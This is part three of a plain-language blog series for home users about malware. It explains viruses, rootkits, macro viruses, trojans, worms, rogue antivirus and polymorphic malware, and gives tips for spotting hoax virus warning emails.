Malware part 3, What Is Malware?
What Is Malware?
Years ago I worked in landscaping. When a customer asked how to tell a weed from a desirable plant, we would tell them that a weed is any plant that grows where you don’t want it. Malware is short for “malicious software,” and you can think of it as any piece of software that’s running where you don’t want it. There are three basic types of malware: viruses, trojans, and worms.
Just like a biological virus, a computer virus is a program that makes copies of itself to spread around. Once it has infected your computer, it will try to insert itself into other programs and files that you might share with somebody else, or it will try to create new files that might be copied onto removable media or sent through email. When someone else runs that program or opens that file, they’ll get infected too. Where a computer virus is different from a biological virus—well, most biological viruses—is that you have to do something to be infected. It doesn’t just happen. It won’t jump from one computer to another if they get too close to one another. You have to run the infected program or open the infected file in order to spread the infection. Viruses can be very nasty critters. They can erase or damage files, steal your private information, open more security holes, and even make your computer completely unusable.
There are four general kinds of viruses, and any one virus can fall into multiple categories:
Boot Sector/MBR Virus
The first type of virus is a file infector. Just like it sounds, it infects other files. When it’s code is executed, it will search for a particular file or a type of file and then either add itself to that file or replace some other code with a copy of itself. Every time you open an infected file, that code will be executed and will try to spread into yet more files.
The second type of virus is a boot sector virus. Before flash drives were invented, spinning disk drives were the most common type of removable storage media. Most hard drives today are still spinning disks (aka platters) inside a small metal box. Those disks are divided into physical sectors. The very first sector on a disk is called the boot sector. The physical boot sector on a hard drive is also called a Master Boot Record or MBR because a hard drive can be divided up into pieces called partitions that each act like a separate drive. Each of those partitions has its own boot sector that is loaded into the computer’s memory after the MBR is loaded. Although flash drives don’t have spinning disks or sectors, they still act as if they have a boot sector so that the BIOS won’t be as confused as I’m sure you must be right about now.
As a computer boots up, it runs code from several different locations. First, it runs the BIOS or Basic Input/Output System that is stored in a chip on the motherboard. When you see the Dell or HP or some other manufacturer’s logo, that’s the BIOS. Instead of a logo, sometimes you might see the computer clearing or testing memory or detecting the presence of drives and other devices. You should also see a message telling you to press a key to enter Setup, usually F2 or Esc or some other key or combination of keys. If you press that key and look into your computer’s BIOS setup, you will see something called boot order or boot priority. This is a list of devices on which the BIOS will look for a bootable OS like Windows or Mac OS X. It might look something like this:
If you select Removable Devices, you would be able to choose from whatever removable devices, such as DVD or flash drives, are installed on your computer. You can change this order so that the computer will always try to boot from a particular device first.
After the computer loads the BIOS, it then looks for a boot sector on the first device in the boot list and runs whatever code it finds there. If it finds a virus, then it runs the virus which will then infect every other device on your system. Since it’s running before the OS ever loads, there is no AV software to intercept it, and it can do pretty much anything it wants. These very nasty bugs frequently cannot be removed by AV software even when they are detected. Sometimes the only way to get rid of them is to format the infected drives and reinstall everything, affectionately known in the computer support world as a nuke-and-pave. Formatting a drive erases everything, so make sure you have a good backup of all your files before attempting it! I don’t recommend you attempt a low level format. If you think that might be necessary, you should call in a professional.
A rootkit is similar to a boot sector virus in that it executes before any antivirus software has a chance to load. They can be very sneaky beasts indeed. A rootkit operates by replacing or inserting itself into important OS files and knows some neat tricks for hiding. Normally, when your AV software scans your system, it checks the files and configuration on your computer for suspicious looking code. It will even look into hidden and system files that a user normally wouldn’t see. To look at those files, the AV software must go through the OS. But what if the part of the OS that serves up the files has been hijacked? When the AV asks to look at an infected file, the rootkit can show it the original, uninfected file instead, fooling it into thinking there’s nothing wrong. That is playing seriously dirty. Other tricks of rootkits include opening backdoors or even altering the login software to give unauthorized users access to the system. Rootkits are understandably difficult to detect and notoriously hard to remove. As with boot sector viruses, sometimes the only way to remove a rootkit is to do a nuke-and-pave.
A macro virus doesn’t attack the computer’s operating system or just any executable file it finds. Instead, it targets a particular application that makes use of macros. A macro is a set of common tasks that many programs will let you automate. For example, you can have a spreadsheet that makes automatic calculations when you open it or a text document that applies a particular format to a block of text whenever you press Ctrl-Alt-F1 or some other combination of keys. Macros can save you a lot of time if you know how to use them. Unfortunately, the more powerful the macro tools that a program supports, the more potential there is for misuse.
In Microsoft Office you can use a programming language called Visual Basic for Applications (VBA) to create very complex macros. Back in the mid 90s, I wrote a macro for Microsoft Excel that would collect data from time-sheets and print out workman’s compensation insurance forms based on job classifications and hours worked. That saved my employer many hours of labor and eliminated several potential sources for book-keeping errors. Macros like that are great tools for streamlining business processes, but the very things that make them so useful, make them very dangerous. The problem isn’t limited to Microsoft products. Any program that uses programmable macros—even on a Mac—can be infected by a macro virus.
If you get a macro virus, it’s probably because somebody emailed or otherwise shared an infected file with you. When you opened that document or spreadsheet or whatever it was, the infected macro executed and installed itself into other documents or into some piece of the program you used to open that document type. Macro viruses aren’t as common these days because the companies that make the vulnerable software are including better security features. The people who make viruses have mostly turned their attention elsewhere.
Computer trojans are named for the Trojan Horse of Iliad fame. In the story, the attacking Greeks gave a giant wooden horse to the city of Troy. Thinking this was a really grand gift, the Trojans brought it inside the gates. Later that night, when no one was watching, the horse opened up, spilling Greek invaders into the city, wreaking havoc behind the city’s defenses and opening the gates for the rest of the Greek army. Although there are no actual Greek invaders hidden inside computer trojans, they behave very similarly.
A trojan is a program that appears to be one thing, but actually does something more sinister in secret. They frequently come to you disguised as email attachments and useful, downloadable widgets like screensavers, Internet browser plugins, and—most ironically—antivirus programs. Once installed, they create security vulnerabilities that allow someone to access your computer remotely or to steal your information. Trojans differ from viruses in that they don’t normally infect other files or automatically try to spread themselves.
There are four basic kinds of trojans: downloaded files, spyware, adware, website trojans, and rogue antivirus.
Downloaded file trojans are just what they sound like. They are files that you or someone else downloads from the Internet onto your computer. It might be a cool little widget that claims to make your computer run faster or insert cute smiley faces into your emails, and maybe it really does what it claims. The problem is that it also does something else that nobody told you about.
Spyware is software that watches what you do and reports it to someone else. Many helpful toolbars that you can install into your Web browser keep a record of every website you visit. Usually, these programs aren’t malicious; they’re just invasive. They want to collect data on your interests so they can present more targeted advertisements. You might even knowingly install spyware to keep tabs on your children or employees. Such programs aren’t always benign, however. Some spyware will record everything you type on your keyboard, stealing passwords, credit card numbers, and other personal data.
Adware is similar to spyware and there is a lot of overlap. Adware can slow your computer down, but it’s primary purpose is to get you to look at someone’s advertising. To help in its task, it might record your Internet browsing in order to feed you advertising that’s more likely to catch your attention. Adware usually takes the form of a helpful application like instant messaging, a calendar, or real-time weather reports. It’s not usually malicious, but remains a problem because of its intrusiveness and the negative impact it can have on your computer’s performance.
One of the worst kinds of trojans I’ve seen in recent years is rogue antivirus. This is malware that masquerades as antivirus software with official sounding names like Internet Security 2010. Have you ever seen an advertising banner or a pop-up ad on the Internet that says “Viruses detected on your computer! Click here to remove now!” Well, that’s the beast itself. Don’t click on those advertisements. They’ll give you a virus even faster than would a porn site. Once installed on your computer, a rogue antivirus will disable your real antivirus, your firewall, and other security software and then start downloading and installing more malware wholesale. If left too long, your computer might require some severely invasive procedures to find healing. (Think, “Nuke-and-pave.”)
Viruses and trojans usually depend on you doing something in order to infect your computer. You have to open an infected file or visit an infected website. Worms are different in that you don’t have to do anything to get one. They’re like bad neighbors who are always nosing around and inviting themselves in at the most inopportune moments.
Computer worms take advantage of operating system and software vulnerabilities that started out as features. When computer engineers first began to connect computers together, they were configured to “listen” for calls on the network with no user intervention required.
Computer 1: “Hello, this is Computer 1 calling for Computer 2 on port 22. Is anyone home?”
Computer 2: “Hi Computer 1! This is Computer 2 answering your call on port 22. What can I do for you?”
Computer 1 would then proceed to send commands to Computer 2.
The original intent of this process was to exchange legitimate messages or data, but very quickly some people realized that they could use this same method for any number of nefarious purposes. You can use it to copy viruses to another computer, completely bypassing the end users. Since worms became common in the 1990’s most operating systems and major software packages have been redesigned to prevent the most obvious vectors for infection. Most routers, even home network routers, have built in firewalls to prevent unsolicited connection attempts. Microsoft added a basic firewall to Windows XP and later versions of Windows, and most antivirus packages now include a firewall component as well.
Even with all those added layers of protection, computer worms remain one of the most prevalent and dangerous forms of malware around.
Antivirus scanners search through files for known pieces of virus code. In order to avoid detection, a polymorphic virus changes its own internal structure. It can rearrange its code, add or remove sections of meaningless bits in between the stretches of truly virulent code, and sometimes even change its behavior. All of the most destructive types of malware—viruses, trojans, and worms—can also be polymorphic. Because it takes a much more sophisticated programmer to create them, these critters are much more difficult to spot and remove, and are much more likely to be dangerous. They aren’t as common as simpler viruses yet but are quickly becoming the norm.
They’re All the Same Anyway
Having described all these different kinds of viruses, now I have to tell you that the differences are largely disappearing. Worms, trojans, viruses, spyware…most common malware these days could actually fall into any and all of those categories. You might get an email notification of a password change to your Facebook account or from a friend telling you about this crazy video of you he found on Youtube. You click on an enclosed link to a website that isn’t actually Facebook or Youtube. That website installs a rogue antivirus on your computer which then spies on you, steals your information, creates backdoors into your computer, uses it to find and attack other computers on your home or office network, and turns them all into zombies to send more bogus password change notices. Villainous isn’t it? The work of truly evil non-geniuses.
Have you ever received an email that said, “If you get an email with such-and-such subject, don’t open it! It will steal your banking information, send pornographic emails to all your friends, erase your entire hard drive, set your monitor on fire, and maybe even pick your friend’s nose! DON’T OPEN IT! Delete it immediately! If you love your family and friends, send this message on to everyone in your address book right now, or you’ll have bad luck for the next 70 years!!!!” In case you didn’t already know, that email was a hoax. Your friend who sent it to you probably thought he was telling you something important, but in reality he was just filling up your inbox with garbage, wasting your valuable time, and clogging up your email server’s spam filters. I haven’t seen as many of these warnings in recent years, but there was a time when they were a much bigger problem than the viruses from which they purported to save us!
Viruses can do a lot of bad things, but most hoax virus warnings are over the top. Here are some things that malware can do:
Corrupt data and files
Delete some files
Steal your passwords and other information that you type or store on your computer
Make your computer run slower
Send copies of itself to other people
Steal email addresses from your address book
Send spam to everyone in the world
Hijack your Internet browser
Cause error messages
Reboot your computer
I’m sure there are many other things that I could add to this list, but you get the idea: Computer viruses can be bad, but they aren’t omnipotent. They can’t set your house on fire. They can’t damage your computer’s hardware. They can’t blow anything up or kill anyone (at least not directly). They can’t completely erase your hard drive. In general, emailed virus warnings are much more of a nuisance than a help. Here are some tips to help you spot virus hoaxes:
- It describes unlikely effects of the supposed virus.
- The subject or major parts of the email are in all capitals. Legitimate press releases and stories about real life computer viruses don’t shout. Sometimes the news stories might be inaccurate or exaggerated, but they usually try to maintain a professional appearance.
- Microsoft, Apple, and other well-known companies will never send you an email about a new and dangerous virus unless you specifically requested it.
- Legitimate virus warnings will almost never arrive via email.
- No reputable company will ever tell you to forward an email to all your friends no matter the subject or how important it might be. (And on that note, they will also never offer to reward you with cash or prizes if you forward an email.)
i Staples Network Services by Thrive. “Thrive Tech Brief: September 2009/Website Malware.” Thrive Networks. Accessed 01/04/2010. http://www.thrivenetworks.com/resources/september-2009-website-malware.html